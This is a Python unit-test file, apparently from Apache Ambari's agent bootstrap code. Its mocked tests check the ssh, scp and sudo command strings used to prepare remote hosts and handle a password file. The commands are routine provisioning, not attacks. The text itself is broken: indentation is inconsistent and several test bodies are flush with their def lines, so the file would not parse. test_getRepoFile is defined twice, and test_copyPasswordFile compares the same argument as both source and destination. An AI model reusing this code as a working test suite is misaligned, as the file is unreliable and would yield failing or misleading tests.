    bootstrap_obj.getUtime = MagicMock(return_value=utime1)
    remote1 = bootstrap_obj.getRemoteName("/tmp/setupAgent.sh")
    self.assertEquals(remote1, "/tmp/setupAgent{0}.sh".format(utime1))
    bootstrap_obj.getUtime.return_value = utime2
    # Same file again: the cached name (with utime1) must be returned.
    remote1 = bootstrap_obj.getRemoteName("/tmp/setupAgent.sh")
    self.assertEquals(remote1, "/tmp/setupAgent{0}.sh".format(utime1))
    remote2 = bootstrap_obj.getRemoteName("/tmp/host_pass")
    self.assertEquals(remote2, "/tmp/host_pass{0}".format(utime2))
# TODO: Test bootstrap timeout
# TODO: test_return_error_message_for_missing_sudo_package
def test_getAmbariPort(self):
    """getAmbariPort() returns the configured port, or the literal
    string "null" when no server port was provided."""
    state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                        "setupAgentFile", "ambariServer", "centos6",
                        None, "8440", "root")
    self.assertEquals(Bootstrap("hostname", state).getAmbariPort(), "8440")
    state.server_port = None
    self.assertEquals(Bootstrap("hostname", state).getAmbariPort(), "null")
@patch.object(subprocess32, "Popen")
@patch("sys.stderr")
@patch("sys.exit")
@patch.object(PBootstrap, "run")
@patch("os.path.dirname")
@patch("os.path.realpath")
def test_bootstrap_main(self, dirname_mock, realpath_mock, run_mock, exit_mock, stderr_mock, subprocess32_Popen_mock):
    """main() with a complete argument vector (with or without a
    password file) must invoke PBootstrap.run(); with too few arguments
    it must call sys.exit.

    NOTE(review): @patch decorators inject mocks bottom-up, so the
    mocks bound to dirname_mock/realpath_mock appear swapped; harmless
    here because neither is inspected -- verify if they ever are.
    """
    bootstrap.main(["bootstrap.py", "hostname,hostname2", "/tmp/bootstrap", "root", "123", "sshkey_file", "setupAgent.py", "ambariServer", \
                    "centos6", "1.1.1", "8440", "root", "passwordfile"])
    self.assertTrue(run_mock.called)
    run_mock.reset_mock()
    bootstrap.main(["bootstrap.py", "hostname,hostname2", "/tmp/bootstrap", "root", "123", "sshkey_file", "setupAgent.py", "ambariServer", \
                    "centos6", "1.1.1", "8440", "root", None])
    self.assertTrue(run_mock.called)
    run_mock.reset_mock()
    # Make sys.exit observable by turning it into an exception.
    def side_effect(retcode):
        raise Exception(retcode, "sys.exit")
    exit_mock.side_effect = side_effect
    try:
        bootstrap.main(["bootstrap.py","hostname,hostname2", "/tmp/bootstrap"])
        self.fail("sys.exit(2)")
    except Exception:
        # Expected
        pass
    self.assertTrue(exit_mock.called)
@patch("os.environ")
def test_getRunSetupWithPasswordCommand(self, environ_mock):
    """The password variant of the agent setup command must pipe the
    host password file into `sudo -S` and embed the utime-suffixed
    script name."""
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    # Any environment lookup (the passphrase) returns this value.
    environ_mock.__getitem__.return_value = "TEST_PASSPHRASE"
    bootstrap_obj = Bootstrap("hostname", shared_state)
    utime = 1234
    bootstrap_obj.getUtime = MagicMock(return_value=utime)
    ret = bootstrap_obj.getRunSetupWithPasswordCommand("hostname")
    expected = "/var/lib/ambari-agent/tmp/ambari-sudo.sh -S python /var/lib/ambari-agent/tmp/setupAgent{0}.py hostname TEST_PASSPHRASE " \
               "ambariServer root 8440 < /var/lib/ambari-agent/tmp/host_pass{0}".format(utime)
    self.assertEquals(ret, expected)
def test_generateRandomFileName(self):
    """With no filename given, generateRandomFileName() falls back to
    the current utime value."""
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    # NOTE(review): comparing two separate getUtime() calls assumes the
    # value is stable within the test -- confirm its granularity.
    self.assertTrue(bootstrap_obj.generateRandomFileName(None) == bootstrap_obj.getUtime())
@patch.object(OSCheck, "is_redhat_family")
@patch.object(OSCheck, "is_suse_family")
def test_getRepoDir(self, is_suse_family, is_redhat_family):
    """getRepoDir() picks the repository directory by OS family:
    zypper layout on SUSE, yum layout otherwise."""
    state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                        "setupAgentFile", "ambariServer", "centos6",
                        None, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", state)
    cases = [
        # (suse?, redhat?, expected repo directory)
        (True, False, "/etc/zypp/repos.d"),
        (False, True, "/etc/yum.repos.d"),
    ]
    for suse, redhat, expected in cases:
        is_suse_family.return_value = suse
        is_redhat_family.return_value = redhat
        self.assertEquals(bootstrap_obj.getRepoDir(), expected)
def test_getSetupScript(self):
    """The shared state must expose the script dir it was built with."""
    state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                        "setupAgentFile", "ambariServer", "centos6",
                        None, "8440", "root")
    obj = Bootstrap("hostname", state)
    self.assertEquals(obj.shared_state.script_dir, "scriptDir")
def test_run_setup_agent_command_ends_with_project_version(self):
    """When a project version is configured, the agent setup command
    must end with "<version> <server port>"."""
    os.environ[AMBARI_PASSPHRASE_VAR_NAME] = ""
    version = "1.1.1"
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               version, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    runSetupCommand = bootstrap_obj.getRunSetupCommand("hostname")
    self.assertTrue(runSetupCommand.endswith(version + " 8440"))
def test_agent_setup_command_without_project_version(self):
    """Without a project version the setup command still ends with the
    server port (and no version string)."""
    os.environ[AMBARI_PASSPHRASE_VAR_NAME] = ""
    version = None
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               version, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    runSetupCommand = bootstrap_obj.getRunSetupCommand("hostname")
    self.assertTrue(runSetupCommand.endswith(" 8440"))
# TODO: test_os_check_fail_fails_bootstrap_execution
def test_host_log(self):
    """HostLog.write() appends to the file and guarantees exactly one
    trailing newline per write (none is added if the chunk already
    ends with one)."""
    tmp_fd, tmp_filename = tempfile.mkstemp()
    # Fix: close the descriptor returned by mkstemp to avoid leaking
    # it; HostLog opens the path itself.
    os.close(tmp_fd)
    dummy_log = HostLog(tmp_filename)
    expected = ""
    for chunk in ("a\nb\nc", "Yet another string", "line break->\n"):
        dummy_log.write(chunk)
        # A newline is appended only when the chunk lacks one.
        expected += chunk if chunk.endswith("\n") else chunk + "\n"
        with open(tmp_filename) as f:
            self.assertEquals(f.read(), expected)
    # Cleanup
    os.unlink(tmp_filename)
@patch.object(subprocess32, "Popen")
def test_SCP(self, popenMock):
    """SCP.run() must build the expected scp command line, mirror the
    child's stdout/stderr into the host log, and report the child's
    exit code in the returned dict."""
    params = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                         "setupAgentFile", "ambariServer", "centos6",
                         "1.2.1", "8440", "root")
    host_log_mock = MagicMock()
    log = {'text': ""}
    # Accumulate everything written to the host log for inspection.
    def write_side_effect(text):
        log['text'] = log['text'] + text
    host_log_mock.write.side_effect = write_side_effect
    scp = SCP(params.user, params.sshPort, params.sshkey_file, "dummy-host", "src/file",
              "dst/file", params.bootdir, host_log_mock)
    log_sample = "log_sample"
    error_sample = "error_sample"
    # Successful run
    process = MagicMock()
    popenMock.return_value = process
    process.communicate.return_value = (log_sample, error_sample)
    process.returncode = 0
    retcode = scp.run()
    self.assertTrue(popenMock.called)
    self.assertTrue(log_sample in log['text'])
    self.assertTrue(error_sample in log['text'])
    # Exact scp argv including port/key/batch-mode options.
    command_str = str(popenMock.call_args[0][0])
    self.assertEquals(command_str, "['scp', '-r', '-o', 'ConnectTimeout=60', '-o', "
                      "'BatchMode=yes', '-o', 'StrictHostKeyChecking=no', '-P', '123', '-i', 'sshkey_file',"
                      " 'src/file', 'root@dummy-host:dst/file']")
    self.assertEqual(retcode["exitstatus"], 0)
    log['text'] = ""
    #unsuccessfull run
    process.returncode = 1
    retcode = scp.run()
    self.assertTrue(log_sample in log['text'])
    self.assertTrue(error_sample in log['text'])
    self.assertEqual(retcode["exitstatus"], 1)
@patch.object(subprocess32, "Popen")
def test_SSH(self, popenMock):
    """SSH.run() must build the expected ssh command line, mirror the
    child's stdout/stderr into the host log, report the exit status,
    and include the optional errorMessage on failure."""
    params = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                         "setupAgentFile", "ambariServer", "centos6",
                         "1.2.1", "8440", "root")
    host_log_mock = MagicMock()
    log = {'text': ""}
    # Accumulate everything written to the host log for inspection.
    def write_side_effect(text):
        log['text'] = log['text'] + text
    host_log_mock.write.side_effect = write_side_effect
    ssh = SSH(params.user, params.sshPort, params.sshkey_file, "dummy-host", "dummy-command",
              params.bootdir, host_log_mock)
    log_sample = "log_sample"
    error_sample = "error_sample"
    # Successful run
    process = MagicMock()
    popenMock.return_value = process
    process.communicate.return_value = (log_sample, error_sample)
    process.returncode = 0
    retcode = ssh.run()
    self.assertTrue(popenMock.called)
    self.assertTrue(log_sample in log['text'])
    self.assertTrue(error_sample in log['text'])
    # Exact ssh argv including key, port and the remote command.
    command_str = str(popenMock.call_args[0][0])
    self.assertEquals(command_str, "['ssh', '-o', 'ConnectTimeOut=60', '-o', "
                      "'StrictHostKeyChecking=no', '-o', 'BatchMode=yes', '-tt', '-i', "
                      "'sshkey_file', '-p', '123', 'root@dummy-host', 'dummy-command']")
    self.assertEqual(retcode["exitstatus"], 0)
    log['text'] = ""
    #unsuccessfull run
    process.returncode = 1
    retcode = ssh.run()
    self.assertTrue(log_sample in log['text'])
    self.assertTrue(error_sample in log['text'])
    self.assertEqual(retcode["exitstatus"], 1)
    log['text'] = ""
    # unsuccessful run with error message
    process.returncode = 1
    dummy_error_message = "dummy_error_message"
    ssh = SSH(params.user, params.sshPort, params.sshkey_file, "dummy-host", "dummy-command",
              params.bootdir, host_log_mock, errorMessage= dummy_error_message)
    retcode = ssh.run()
    self.assertTrue(log_sample in log['text'])
    self.assertTrue(error_sample in log['text'])
    self.assertTrue(dummy_error_message in log['text'])
    self.assertEqual(retcode["exitstatus"], 1)
def test_getOsCheckScript(self):
    """The OS-check script must live inside the configured script dir."""
    state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                        "setupAgentFile", "ambariServer", "centos6",
                        None, "8440", "root")
    obj = Bootstrap("hostname", state)
    self.assertEquals(obj.getOsCheckScript(), "scriptDir/os_check_type.py")
@patch.object(BootstrapDefault, "getRemoteName")
def test_getOsCheckScriptRemoteLocation(self, getRemoteName_mock):
    """The remote location is whatever getRemoteName() produces."""
    state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                        "setupAgentFile", "ambariServer", "centos6",
                        None, "8440", "root")
    obj = Bootstrap("hostname", state)
    expected = "/tmp/os_check_type1374259902.py"
    getRemoteName_mock.return_value = expected
    self.assertEquals(obj.getOsCheckScriptRemoteLocation(), expected)
@patch.object(BootstrapDefault, "is_suse")
def test_getRepoFile(self, is_suse_mock):
    """On non-SUSE systems the ambari repo file lives in yum.repos.d.

    NOTE(review): another method further down in this class was also
    defined with the name test_getRepoFile; duplicate definitions
    shadow this one at class-definition time -- verify both tests run.
    """
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    is_suse_mock.return_value = False
    rf = bootstrap_obj.getRepoFile()
    self.assertEquals(rf, "/etc/yum.repos.d/ambari.repo")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_createTargetDir(self, write_mock, run_mock,
                         init_mock):
    """createTargetDir() must run the exact remote mkdir/chown/chmod
    command chain over SSH and pass SSH.run()'s result through."""
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    expected = 42
    init_mock.return_value = None
    run_mock.return_value = expected
    res = bootstrap_obj.createTargetDir()
    self.assertEquals(res, expected)
    # The 5th positional argument to SSH.__init__ is the remote command.
    command = str(init_mock.call_args[0][4])
    self.assertEqual(command,
                     "SUDO=$([ \"$EUID\" -eq 0 ] && echo || echo sudo) ; $SUDO mkdir -p /var/lib/ambari-agent/tmp ; "
                     "$SUDO chown -R root /var/lib/ambari-agent/tmp ; "
                     "$SUDO chmod 755 /var/lib/ambari-agent ; "
                     "$SUDO chmod 755 /var/lib/ambari-agent/data ; "
                     "$SUDO chmod 1777 /var/lib/ambari-agent/tmp")
@patch.object(BootstrapDefault, "getOsCheckScript")
@patch.object(BootstrapDefault, "getOsCheckScriptRemoteLocation")
@patch.object(SCP, "__init__")
@patch.object(SCP, "run")
@patch.object(HostLog, "write")
def test_copyOsCheckScript(self, write_mock, run_mock, init_mock,
                           getOsCheckScriptRemoteLocation_mock, getOsCheckScript_mock):
    """copyOsCheckScript() must SCP the local OS-check script to the
    remote location and pass SCP.run()'s result through."""
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    getOsCheckScript_mock.return_value = "OsCheckScript"
    getOsCheckScriptRemoteLocation_mock.return_value = "OsCheckScriptRemoteLocation"
    expected = 42
    init_mock.return_value = None
    run_mock.return_value = expected
    res = bootstrap_obj.copyOsCheckScript()
    self.assertEquals(res, expected)
    # Positional args 5 and 6 of SCP.__init__ are source and destination.
    input_file = str(init_mock.call_args[0][4])
    remote_file = str(init_mock.call_args[0][5])
    self.assertEqual(input_file, "OsCheckScript")
    self.assertEqual(remote_file, "OsCheckScriptRemoteLocation")
@patch.object(BootstrapDefault, "getRemoteName")
@patch.object(BootstrapDefault, "hasPassword")
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
def test_getRepoFile(self, is_redhat_family, is_ubuntu_family, is_suse_family, hasPassword_mock, getRemoteName_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
is_redhat_family.return_value = True
is_ubuntu_family.return_value = False
is_suse_family.return_value = False
bootstrap_obj = Bootstrap("hostname", shared_state)
# Without password
hasPassword_mock.return_value = False
getRemoteName_mock.return_value = "RemoteName"
rf = bootstrap_obj.getMoveRepoFileCommand("target")
self.assertEquals(rf, "/var/lib/ambari-agent/tmp/ambari-sudo.sh mv RemoteName target/ambari.repo")
# With password
hasPassword_mock.return_value = True
getRemoteName_mock.return_value = "RemoteName"
rf = bootstrap_obj.getMoveRepoFileCommand("target")
self.assertEquals(rf, "/var/lib/ambari-agent/tmp/ambari-sudo.sh -S mv RemoteName target/ambari.repo < RemoteName")
  @patch("os.path.exists")
  @patch.object(OSCheck, "is_suse_family")
  @patch.object(OSCheck, "is_ubuntu_family")
  @patch.object(OSCheck, "is_redhat_family")
  @patch.object(BootstrapDefault, "getMoveRepoFileCommand")
  @patch.object(BootstrapDefault, "getRepoDir")
  @patch.object(BootstrapDefault, "getRepoFile")
  @patch.object(BootstrapDefault, "getRemoteName")
  @patch.object(SCP, "__init__")
  @patch.object(SCP, "run")
  @patch.object(SSH, "__init__")
  @patch.object(SSH, "run")
  @patch.object(HostLog, "write")
  def test_copyNeededFiles(self, write_mock, ssh_run_mock, ssh_init_mock,
                           scp_run_mock, scp_init_mock,
                           getRemoteName_mock, getRepoFile_mock, getRepoDir,
                           getMoveRepoFileCommand, is_redhat_family, is_ubuntu_family, is_suse_family,
                           os_path_exists_mock):
    """copyNeededFiles() should copy the repo file (when it exists locally)
    and the setup-agent script, run the follow-up SSH commands, and return
    the maximum exit status observed across all SCP/SSH operations.

    When the local Ambari repo file is missing, only the setup script is
    copied and no SSH command is issued at all.
    """
    #
    # Ambari repo file exists
    #
    # os.path.exists is faked to report True only for the repo file path.
    def os_path_exists_side_effect(*args, **kwargs):
      if args[0] == getRepoFile_mock():
        return True
      else:
        return False
    os_path_exists_mock.side_effect = os_path_exists_side_effect
    os_path_exists_mock.return_value = None
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    is_redhat_family.return_value = True
    is_ubuntu_family.return_value = False
    is_suse_family.return_value = False
    bootstrap_obj = Bootstrap("hostname", shared_state)
    getMoveRepoFileCommand.return_value = "MoveRepoFileCommand"
    getRepoDir.return_value = "RepoDir"
    getRemoteName_mock.return_value = "RemoteName"
    getRepoFile_mock.return_value = "RepoFile"
    expected1 = {"exitstatus": 42, "log": "log42", "errormsg": "errorMsg"}
    expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
    expected3 = {"exitstatus": 1, "log": "log1", "errormsg": "errorMsg"}
    expected4 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
    scp_init_mock.return_value = None
    ssh_init_mock.return_value = None
    # Testing max retcode return (largest status comes from the first SCP)
    scp_run_mock.side_effect = [expected1, expected3]
    ssh_run_mock.side_effect = [expected2, expected4]
    res = bootstrap_obj.copyNeededFiles()
    self.assertEquals(res, expected1["exitstatus"])
    # SCP.__init__ positional args 4 and 5 carry the local and remote paths.
    input_file = str(scp_init_mock.call_args[0][4])
    remote_file = str(scp_init_mock.call_args[0][5])
    self.assertEqual(input_file, "setupAgentFile")
    self.assertEqual(remote_file, "RemoteName")
    # SSH.__init__ positional arg 4 carries the remote command line.
    command = str(ssh_init_mock.call_args[0][4])
    self.assertEqual(command, "/var/lib/ambari-agent/tmp/ambari-sudo.sh chmod 644 RepoFile")
    # Another order (largest status comes from the first SSH command)
    expected1 = {"exitstatus": 0, "log": "log0", "errormsg": "errorMsg"}
    expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
    expected3 = {"exitstatus": 1, "log": "log1", "errormsg": "errorMsg"}
    expected4 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
    scp_run_mock.side_effect = [expected1, expected3]
    ssh_run_mock.side_effect = [expected2, expected4]
    res = bootstrap_obj.copyNeededFiles()
    self.assertEquals(res, expected2["exitstatus"])
    # yet another order (largest status comes from the second SCP)
    expected1 = {"exitstatus": 33, "log": "log33", "errormsg": "errorMsg"}
    expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
    expected3 = {"exitstatus": 42, "log": "log42", "errormsg": "errorMsg"}
    expected4 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
    scp_run_mock.side_effect = [expected1, expected3]
    ssh_run_mock.side_effect = [expected2, expected4]
    res = bootstrap_obj.copyNeededFiles()
    self.assertEquals(res, expected3["exitstatus"])
    #
    # Ambari repo file does not exist
    #
    os_path_exists_mock.side_effect = None
    os_path_exists_mock.return_value = False
    # Expectations:
    #   SSH will not be called at all
    #   SCP will be called once for copying the setup script file
    scp_run_mock.reset_mock()
    ssh_run_mock.reset_mock()
    expectedResult = {"exitstatus": 33, "log": "log33", "errormsg": "errorMsg"}
    scp_run_mock.side_effect = [expectedResult]
    res = bootstrap_obj.copyNeededFiles()
    self.assertFalse(ssh_run_mock.called)
    self.assertEquals(res, expectedResult["exitstatus"])
@patch.object(BootstrapDefault, "getOsCheckScriptRemoteLocation")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_runOsCheckScript(self, write_mock, run_mock,
init_mock, getOsCheckScriptRemoteLocation_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
getOsCheckScriptRemoteLocation_mock.return_value = "OsCheckScriptRemoteLocation"
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.runOsCheckScript()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command,
"chmod a+x OsCheckScriptRemoteLocation && "
"env PYTHONPATH=$PYTHONPATH:/var/lib/ambari-agent/tmp OsCheckScriptRemoteLocation centos6")
@patch.object(SSH, "__init__")
@patch.object(BootstrapDefault, "getRunSetupCommand")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_runSetupAgent(self, write_mock, run_mock,
getRunSetupCommand_mock, init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
getRunSetupCommand_mock.return_value = "RunSetupCommand"
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.runSetupAgent()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "RunSetupCommand")
@patch.object(BootstrapDefault, "hasPassword")
@patch.object(BootstrapDefault, "getRunSetupWithPasswordCommand")
@patch.object(BootstrapDefault, "getRunSetupWithoutPasswordCommand")
def test_getRunSetupCommand(self, getRunSetupWithoutPasswordCommand_mock,
getRunSetupWithPasswordCommand_mock,
hasPassword_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
# With password
hasPassword_mock.return_value = True
getRunSetupWithPasswordCommand_mock.return_value = "RunSetupWithPasswordCommand"
getRunSetupWithoutPasswordCommand_mock.return_value = "RunSetupWithoutPasswordCommand"
res = bootstrap_obj.getRunSetupCommand("dummy-host")
self.assertEqual(res, "RunSetupWithPasswordCommand")
# Without password
hasPassword_mock.return_value = False
res = bootstrap_obj.getRunSetupCommand("dummy-host")
self.assertEqual(res, "RunSetupWithoutPasswordCommand")
@patch.object(HostLog, "write")
def test_createDoneFile(self, write_mock):
tmp_dir = tempfile.gettempdir()
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", tmp_dir,
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
done_file = os.path.join(tmp_dir, "hostname.done")
expected = 42
bootstrap_obj.createDoneFile(expected)
with open(done_file) as df:
res = df.read()
self.assertEqual(res, str(expected))
os.unlink(done_file)
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_checkSudoPackage(self, write_mock, run_mock, init_mock, is_redhat_family, is_ubuntu_family, is_suse_family):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
is_redhat_family.return_value = True
is_ubuntu_family.return_value = False
is_suse_family.return_value = False
res = bootstrap_obj.checkSudoPackage()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "[ \"$EUID\" -eq 0 ] || rpm -qa | grep -e '^sudo\-'")
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_checkSudoPackageUbuntu(self, write_mock, run_mock, init_mock,
is_redhat_family, is_ubuntu_family, is_suse_family):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "ubuntu12",
None, "8440", "root")
is_redhat_family.return_value = False
is_ubuntu_family.return_value = True
is_suse_family.return_value = False
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.checkSudoPackage()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "[ \"$EUID\" -eq 0 ] || dpkg --get-selections|grep -e '^sudo\s*install'")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
@patch.object(BootstrapDefault, "getPasswordFile")
def test_deletePasswordFile(self, getPasswordFile_mock, write_mock, run_mock,
init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
getPasswordFile_mock.return_value = "PasswordFile"
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.deletePasswordFile()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "rm PasswordFile")
@patch.object(BootstrapDefault, "getPasswordFile")
@patch.object(SCP, "__init__")
@patch.object(SCP, "run")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_copyPasswordFile(self, write_mock, ssh_run_mock,
ssh_init_mock, scp_run_mock,
scp_init_mock, getPasswordFile_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root", password_file="PasswordFile")
bootstrap_obj = Bootstrap("hostname", shared_state)
getPasswordFile_mock.return_value = "PasswordFile"
# Testing max retcode return
expected1 = {"exitstatus": 42, "log": "log42", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
scp_init_mock.return_value = None
scp_run_mock.return_value = expected1
ssh_init_mock.return_value = None
ssh_run_mock.return_value = expected2
res = bootstrap_obj.copyPasswordFile()
self.assertEquals(res, expected1["exitstatus"])
input_file = str(scp_init_mock.call_args[0][4])
remote_file = str(scp_init_mock.call_args[0][4])
self.assertEqual(input_file, "PasswordFile")
self.assertEqual(remote_file, "PasswordFile")
command = str(ssh_init_mock.call_args[0][4])
self.assertEqual(command, "chmod 600 PasswordFile")
# Another order
expected1 = {"exitstatus": 0, "log": "log0", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
scp_run_mock.return_value = expected1
ssh_run_mock.return_value = expected2
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
@patch.object(BootstrapDefault, "getPasswordFile")
def test_changePasswordFileModeOnHost(self, getPasswordFile_mock, write_mock,
run_mock, init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
getPasswordFile_mock.return_value = "PasswordFile"
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.changePasswordFileModeOnHost()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "chmod 600 PasswordFile")
@patch.object(HostLog, "write")
def test_try_to_execute(self, write_mock):
expected = 43
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
# Normal case
def act_normal_return_int():
return 43
ret = bootstrap_obj.try_to_execute(act_normal_return_int)
self.assertEqual(ret["exitstatus"], expected)
self.assertFalse(write_mock.called)
write_mock.reset_mock()
def act_normal_return():
return {"exitstatus": 43}
ret = bootstrap_obj.try_to_execute(act_normal_return)
self.assertEqual(ret["exitstatus"], expected)
self.assertFalse(write_mock.called)
write_mock.reset_mock()
# Exception scenario
def act():
raise IOError()
ret = bootstrap_obj.try_to_execute(act)
self.assertEqual(ret["exitstatus"], 177)
self.assertTrue(write_mock.called)
  @patch.object(BootstrapDefault, "try_to_execute")
  @patch.object(BootstrapDefault, "hasPassword")
  @patch.object(BootstrapDefault, "createDoneFile")
  @patch.object(HostLog, "write")
  @patch("logging.warn")
  @patch("logging.error")
  def test_run(self, error_mock, warn_mock, write_mock, createDoneFile_mock,
               hasPassword_mock, try_to_execute_mock):
    """run() should execute the bootstrap action chain, stop at the first
    failing action, always write the done file, and expose the failing exit
    status via getStatus()["return_code"].

    The expected call counts mirror the length of the action chain inside
    BootstrapDefault.run() (10 actions without a password, 13 with one) and
    must be adjusted when actions are added or removed -- see the inline
    markers.
    """
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    bootstrap_obj = Bootstrap("hostname", shared_state)
    # Testing workflow without password
    bootstrap_obj.copied_password_file = False
    hasPassword_mock.return_value = False
    try_to_execute_mock.return_value = {"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}
    bootstrap_obj.run()
    self.assertEqual(try_to_execute_mock.call_count, 10) # <- Adjust if changed
    self.assertTrue(createDoneFile_mock.called)
    self.assertEqual(bootstrap_obj.getStatus()["return_code"], 0)
    try_to_execute_mock.reset_mock()
    createDoneFile_mock.reset_mock()
    # Testing workflow with password
    bootstrap_obj.copied_password_file = True
    hasPassword_mock.return_value = True
    try_to_execute_mock.return_value = {"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}
    bootstrap_obj.run()
    self.assertEqual(try_to_execute_mock.call_count, 13) # <- Adjust if changed
    self.assertTrue(createDoneFile_mock.called)
    self.assertEqual(bootstrap_obj.getStatus()["return_code"], 0)
    error_mock.reset_mock()
    write_mock.reset_mock()
    try_to_execute_mock.reset_mock()
    createDoneFile_mock.reset_mock()
    # Testing workflow when some action failed before copying password:
    # the chain stops right after the failing (second) action.
    bootstrap_obj.copied_password_file = False
    hasPassword_mock.return_value = False
